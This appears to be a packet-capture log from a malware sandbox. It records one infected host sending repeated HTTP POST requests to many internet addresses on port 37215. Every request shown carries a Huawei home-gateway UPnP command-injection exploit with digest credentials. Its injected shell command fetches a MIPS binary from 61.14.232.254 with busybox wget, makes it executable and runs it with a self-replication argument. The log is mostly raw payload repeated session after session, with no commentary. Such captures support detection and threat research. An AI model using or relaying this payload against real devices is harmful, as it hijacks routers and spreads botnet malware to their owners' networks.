                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1116192.168.2.13378961.52.30.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506215096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1117192.168.2.1335466157.120.37.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506217957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1118192.168.2.1348296157.19.248.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506251097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1119192.168.2.135714876.174.245.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506292105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1120192.168.2.1343698144.66.246.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506326914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1121192.168.2.134425470.22.25.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506362915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1122192.168.2.135144673.240.152.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506377935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1123192.168.2.1350718205.101.233.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506903887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1124192.168.2.1354730157.59.211.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506922007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1125192.168.2.1348604157.221.227.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506952047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 